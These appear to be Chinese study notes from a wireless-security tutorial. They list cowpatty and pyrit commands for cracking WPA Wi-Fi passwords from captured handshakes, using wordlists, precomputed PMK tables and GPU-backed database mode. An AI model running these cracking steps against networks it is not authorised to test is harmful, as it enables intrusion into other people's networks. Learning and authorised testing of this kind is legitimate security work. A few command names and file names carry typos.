如果想深入學(xué)習(xí)無線安全,可以參考評論區(qū)第一條
COWPATTY破解密碼
- WPA密碼通用破解工具
- 使用密碼字段
- cowpatty -r [.CAP包] -f [字典] -s [ssid]
- 使用彩虹表(PMK)
genpmk -f 【字典】 -d pmkhash -s [ssid]
cowpatty -r [.cap包] -d pmkhash -s [ssid]
PYRIT破解密碼
- 與airolib、cowpatty相同,支持基于預(yù)計算的PMK提高破解速度
- 獨(dú)有的優(yōu)勢
- 除CPU之外pyrit可以運(yùn)用GPU的強(qiáng)大運(yùn)算能力加速生成PMK
- 本身支持抓包獲取四步握手過程,無需用Airodump抓包
- 也支持傳統(tǒng)的讀取airodump抓包獲取四部握手的方式
- 只抓取WAP四次握手過程包
- pyrit -r wlan0mon -o wpapyrit.wap stripLive
- pyrit -r wpapyrit.cap analyze #分析抓下來的包
- 從airodump抓包導(dǎo)入并篩選
- pyrit -r wap.cap -o wpapyrit.cap strip
- 使用密碼字典
pyrit -r wpapyrit.cap -i password.ist -b <AP mac> attack passthrough
- 數(shù)據(jù)庫模式破解
- 默認(rèn)使用基于文件的數(shù)據(jù)庫,支持連接SQL數(shù)據(jù)庫,將計算的PMK存儲數(shù)據(jù)庫
- 查看默認(rèn)數(shù)據(jù)庫狀態(tài):pyrit eval
- 導(dǎo)入密碼字典:pyrit -i password.lst import passwords (剔除了不合規(guī)的密碼)
- 指定ESSID:pyrit -e [無線名稱] create essid
- 計算PMK:pyrit batch(發(fā)揮GPU計算能力)
- 破解密碼:pyrit -r wpapyrit.cap -b <AP MAC> attack db